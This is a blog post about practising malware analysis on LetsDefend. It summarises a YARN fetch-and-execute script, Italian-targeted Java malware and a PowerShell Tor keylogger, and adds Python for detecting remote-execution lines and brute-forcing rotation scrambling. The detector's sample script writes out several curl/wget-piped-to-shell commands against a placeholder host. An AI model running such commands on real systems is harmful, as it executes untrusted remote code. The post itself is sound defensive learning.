Cybersecurity

Dissecting Real-World Malware Samples with LetsDefend

I spent a bit of time this weekend refreshing my malware analysis skills by working through some beginner friendly challenges on LetsDefend.

I analyzed:

  • A script used during Hadoop YARN container initialization that fetched and executed a remote payload. This was my first time hearing about Hadoop and YARN, so it was a great opportunity to learn how they’re used and how they can be abused.
  • Samba Spy Java malware that specifically targeted Italian users by checking for an Italian keyboard layout and ensuring it wasn’t running inside a virtual machine. The code used basic string scrambling, similar in concept to ROT13, to obfuscate its functionality.
  • A PowerShell C2 client that connects to Tor through a SOCKS5 proxy, acts as a keylogger, sends system information and screenshots, and allows remote command execution via PowerShell or CMD.
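The YARN sample above boils down to a launch script that downloads something and runs it in the same breath. As an added example (my own code, not the challenge's script or anything from LetsDefend), here is a small Python checker that scans a container launch script line by line for the two fetch-and-execute shapes I look for first: a `curl`/`wget` piped straight into a shell interpreter, and a shell or `eval` wrapping a command-substituted download. The sample script and the `example.invalid` URLs are constructed for the demo.

```python
import re
from typing import List, Tuple

# Constructed sample: a YARN-style container launch script. Lines 2-4 are the
# kind of thing a legitimate launch script does; lines 5-7 fetch and execute.
SAMPLE_LAUNCH_SCRIPT = """#!/bin/bash
export JAVA_HOME=/usr/lib/jvm/java
exec java -Xmx1g org.example.App
curl -o /tmp/conf.json http://example.invalid/conf
curl -fsSL http://example.invalid/payload.sh | bash
wget -qO- "http://example.invalid/x" | sh
bash -c "$(curl -s http://example.invalid/stage2)"
"""

# Each pattern is (label, regex). Order matters: the first match wins per line.
PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    # curl/wget ... | [sudo] bash|sh|zsh|python|perl
    ("pipe-to-shell",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh|python3?|perl)\b")),
    # eval "$(curl ...)"  or  bash -c "$(wget ...)"
    ("eval-of-download",
     re.compile(r"\b(?:eval|bash|sh|zsh)\b.*\$\(\s*(?:curl|wget)\b")),
]


def find_remote_exec(script: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, label, line) for every line that fetches and
    executes remote content in a single command. Comments and blank lines
    are skipped. A download on one line and a chmod/exec on a later line is
    deliberately out of scope for this per-line check."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for label, pattern in PATTERNS:
            if pattern.search(stripped):
                findings.append((lineno, label, stripped))
                break
    return findings


if __name__ == "__main__":
    for lineno, label, text in find_remote_exec(SAMPLE_LAUNCH_SCRIPT):
        print(f"line {lineno:>3} [{label}] {text}")
```

Note that line 4 of the sample (a plain `curl -o` to a config file) is not flagged: a download by itself is normal in a launch script, and it is the direct hand-off to an interpreter that makes the pattern worth a second look. A download that is saved, marked executable and run on a later line slips past this per-line check, so treat it as a triage aid rather than a verdict.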

Fortunately, both the Bash and PowerShell scripts were in plain text, making initial analysis straightforward. The Java-based malware required a bit of decoding, but tools like CyberChef made that painless.
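CyberChef's ROT13 recipe handled the Java sample, but a scrambler that is only "similar in concept" to ROT13 may use a different rotation. As an added example (my own code, not the malware's scrambling routine and not something from the challenge), the Python below goes a step beyond the single ROT13 case: it tries all 26 letter rotations of a scrambled string and ranks the candidates by how many common English words they contain, with letter frequency as a tie-breaker. The plaintext, the rotation shifts and the word list are constructed assumptions for the demo.

```python
import re
from typing import List, Tuple

# Approximate English letter frequencies (percent); only used as a tie-breaker.
LETTER_FREQ = {
    "e": 12.7, "t": 9.1, "a": 8.2, "o": 7.5, "i": 7.0, "n": 6.7, "s": 6.3,
    "h": 6.1, "r": 6.0, "d": 4.3, "l": 4.0, "u": 2.8, "c": 2.8, "m": 2.4,
    "w": 2.4, "f": 2.2, "g": 2.0, "y": 2.0, "p": 1.9, "b": 1.5, "v": 1.0,
    "k": 0.8, "j": 0.2, "x": 0.2, "q": 0.1, "z": 0.1,
}

# Small constructed word list; a real-world decoder would use a larger one.
COMMON_WORDS = {"the", "and", "not", "is", "if", "in", "a",
                "then", "do", "to", "of", "for", "it"}


def rotate(text: str, shift: int) -> str:
    """Caesar-rotate ASCII letters by `shift`, leaving everything else alone.
    rotate(x, 13) is ROT13; rotate(rotate(x, s), 26 - s) == x."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def readability(text: str) -> Tuple[int, float]:
    """Score a candidate plaintext: (common-word hits, letter-frequency sum)."""
    words = re.findall(r"[a-z]+", text.lower())
    hits = sum(1 for w in words if w in COMMON_WORDS)
    freq = sum(LETTER_FREQ.get(c, 0.0) for c in text.lower() if c.isalpha())
    return (hits, freq)


def brute_force_rotation(cipher: str) -> List[Tuple[int, str]]:
    """All 26 decodings of `cipher`, best-scoring first, as (shift, text)."""
    candidates = [(shift, rotate(cipher, shift)) for shift in range(26)]
    candidates.sort(key=lambda c: readability(c[1]), reverse=True)
    return candidates


def best_decoding(cipher: str) -> Tuple[int, str]:
    """The single most readable decoding and the shift that produced it."""
    return brute_force_rotation(cipher)[0]


# Constructed samples: the same string scrambled with ROT13 and with shift 7.
PLAINTEXT = ("if the keyboard layout is not italian then exit "
             "and do not run in a virtual machine")
ROT13_SAMPLE = rotate(PLAINTEXT, 13)
SHIFT7_SAMPLE = rotate(PLAINTEXT, 7)

if __name__ == "__main__":
    for label, sample in (("rot13", ROT13_SAMPLE), ("shift7", SHIFT7_SAMPLE)):
        shift, text = best_decoding(sample)
        print(f"{label}: scrambled={sample!r}")
        print(f"{label}: decode shift={shift} -> {text!r}")
```

The word-hit score does the real work here: a genuine decoding of an English string lights up several dictionary words at once, while the other 25 rotations almost never produce any, so the ranking is stable even with a tiny word list. Scrambling that also touches digits or punctuation, or that is not a rotation at all, needs a different recipe.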

This quick weekend session was a great reminder that even simple malware samples can teach valuable lessons. From identifying malicious behavior in familiar environments like Hadoop and PowerShell, to using tools like CyberChef to decode obfuscated payloads, every sample reinforced essential analysis techniques.

Whether you’re new to malware analysis or brushing up like I was, platforms like LetsDefend offer scenarios to sharpen your skills. I’ll definitely be exploring more complex challenges soon, as time allows.